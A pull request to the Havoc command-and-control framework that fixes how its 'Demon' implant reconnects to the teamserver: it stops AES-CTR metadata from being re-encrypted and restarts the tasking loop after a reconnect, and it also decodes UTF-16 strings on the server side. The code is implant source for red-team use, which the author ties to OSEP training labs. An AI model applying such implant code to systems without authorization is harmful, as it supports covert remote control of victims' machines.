### PR TITLE
fix reconnection issue

### DIFF
--- a/Teamserver/data/implants/Demon/Include/Demon.h
+++ b/Teamserver/data/implants/Demon/Include/Demon.h
@@ -52,6 +52,8 @@ typedef struct
     /* MetaData */
     PPACKAGE MetaData;
 
+    BOOL IsMetadataEncrypted;
+
     struct {
         UINT32  AgentID;
         BOOL    Connected;

--- a/Teamserver/data/implants/Demon/Source/Core/Command.c
+++ b/Teamserver/data/implants/Demon/Source/Core/Command.c
@@ -62,7 +62,7 @@ VOID CommandDispatcher( VOID )
     do
     {
         if ( ! Instance.Session.Connected )
-            return;
+            break;
 
         SleepObf( Instance.Config.Sleeping * 1000 );
 
@@ -146,6 +146,8 @@ VOID CommandDispatcher( VOID )
     } while ( TRUE );
 
     Instance.Session.Connected = FALSE;
+
+    PackageDestroy( Package );
 
     PUTS( "Out of while loop" )
 }

--- a/Teamserver/data/implants/Demon/Source/Core/Package.c
+++ b/Teamserver/data/implants/Demon/Source/Core/Package.c
@@ -194,8 +194,14 @@ BOOL PackageTransmit( PPACKAGE Package, PVOID* Response, PSIZE_T Size )
             if ( Package->CommandID == DEMON_INITIALIZE ) // only add these on init or key exchange
                 Padding += 32 + 16;
 
-            AesInit( &AesCtx, Instance.Config.AES.Key, Instance.Config.AES.IV );
-            AesXCryptBuffer( &AesCtx, Package->Buffer + Padding, Package->Length - Padding );
+            if ( !( Instance.IsMetadataEncrypted && Package->CommandID == DEMON_INITIALIZE ) )
+            {
+                AesInit( &AesCtx, Instance.Config.AES.Key, Instance.Config.AES.IV );
+                AesXCryptBuffer( &AesCtx, Package->Buffer + Padding, Package->Length - Padding );
+            }
+
+            if (Package->CommandID == DEMON_INITIALIZE)
+                Instance.IsMetadataEncrypted = TRUE;
         }
 
         if ( TransportSend( Package->Buffer, Package->Length, Response, Size ) )

--- a/Teamserver/data/implants/Demon/Source/Demon.c
+++ b/Teamserver/data/implants/Demon/Source/Demon.c
@@ -79,10 +79,13 @@ VOID DemonRoutine()
                 /* reset the failure counter since we managed to connect to it. */
                 Instance.Config.Transport.Host->Failures = 0;
 #endif
-
-                /* Enter tasking routine */
-                CommandDispatcher();
             }
+        }
+
+        if ( Instance.Session.Connected )
+        {
+            /* Enter tasking routine */
+            CommandDispatcher();
         }
 
         /* Sleep for a while (with encryption if specified) */
@@ -105,6 +108,7 @@ VOID DemonMetaData( PPACKAGE* MetaData, BOOL Header )
 
         /* Do not destroy this package if we fail to connect to the listener. */
         ( *MetaData )->Destroy = FALSE;
+        Instance.IsMetadataEncrypted = FALSE;
     }
 
     // create AES Keys/IV

--- a/Teamserver/pkg/agent/agent.go
+++ b/Teamserver/pkg/agent/agent.go
@@ -270,7 +270,7 @@ func ParseResponse(AgentID int, Parser *parser.Parser) *Agent {
 		Info: new(AgentInfo),
 	}
 
-	logger.Debug("AES KEY\n" + hex.Dump(Session.Encryption.AESKey))
+	logger.Debug("AES KEY:\n" + hex.Dump(Session.Encryption.AESKey))
 	logger.Debug("AES IV :\n" + hex.Dump(Session.Encryption.AESIv))
 
 	logger.Debug("Buffer:\n" + hex.Dump(Parser.Buffer()))

--- a/Teamserver/pkg/agent/demons.go
+++ b/Teamserver/pkg/agent/demons.go
@@ -2384,7 +2384,7 @@ func (a *Agent) TaskDispatch(CommandID int, Parser *parser.Parser, teamserver Te
 				)
 
 				Output["Type"] = "Info"
-				Output["Message"] = fmt.Sprintf("Uploaded file: %v (%v)", string(FileName), FileSize)
+				Output["Message"] = fmt.Sprintf("Uploaded file: %v (%v)", utils.UTF16BytesToString(FileName), FileSize)
 			} else {
 				Output["Type"] = "Error"
 				Output["Message"] = "Failed to parse FS::Upload response"
@@ -3006,7 +3006,7 @@ func (a *Agent) TaskDispatch(CommandID int, Parser *parser.Parser, teamserver Te
 
 		case DOTNET_INFO_NET_VERSION:
 			Message["Type"] = "Info"
-			Message["Message"] = "Using CLR Version: " + string(Parser.ParseBytes())
+			Message["Message"] = "Using CLR Version: " + utils.UTF16BytesToString(Parser.ParseBytes())
 			break
 
 		case DOTNET_INFO_ENTRYPOINT:

--- a/Teamserver/pkg/utils/utils.go
+++ b/Teamserver/pkg/utils/utils.go
@@ -3,6 +3,7 @@ package utils
 import (
     "encoding/base64"
     "encoding/binary"
+    "unicode/utf16"
     "fmt"
     "math/rand"
     "os"
@@ -20,6 +21,15 @@ const (
     letterIdxMask = 1<<letterIdxBits - 1
     letterIdxMax  = 63 / letterIdxBits
 )
+
+func UTF16BytesToString(b []byte) string {
+    size := (len(b) - 2) / 2
+    utf := make([]uint16, size)
+    for i := 0; i < size; i += 1 {
+        utf[i] = binary.LittleEndian.Uint16(b[i*2:])
+    }
+    return string(utf16.Decode(utf))
+}
 
 func GenerateID(n int) string {
     var src = rand.NewSource(time.Now().UnixNano())


### PR DESCRIPTION
Hello @Cracked5pider!

I have been using Havoc for the OSEP labs and is an amazing piece of software.  

While playing around, I noticed that there is an issue with the re-connection logic.  
As you know, when Demon tries to re-connect, it will call `TransportInit()` which will send a DEMON_INITIALIZE request to the teamserver.  
However, the teamserver only handles `DEMON_INIT` requests if the Demon is *not* previously known. I have now changed this.   

Also, because AES is used in CTR mode, encrypting and decrypting are essentially the same operation.  
The metadata package is sent (and encrypted) when the Demon first connects to the teamserver. When it tries to re-connect, it will try to re-encrypt the package, effectively decrypting it. I have also fixed this.

To test this, I recommend modifying `Command.c`:
```c
    ULONG32 counter = 0;
    do
    {
        // ...
        counter++;
        if (counter == 5)
        {
            Instance.Session.Connected = FALSE;
            PUTS( "simmulating disconnect..." );
            counter = 0;
        }
    } while ( TRUE );
```

Also, I fixed a small bug where the teamserver was parsing wide strings as normal strings.

EDIT: As many people are likely to encounter this issue, I'm trying to merge directly to the main branch (also I don't know how to build the `dev` branch 😛)

Let me know what you think :^)
Bye!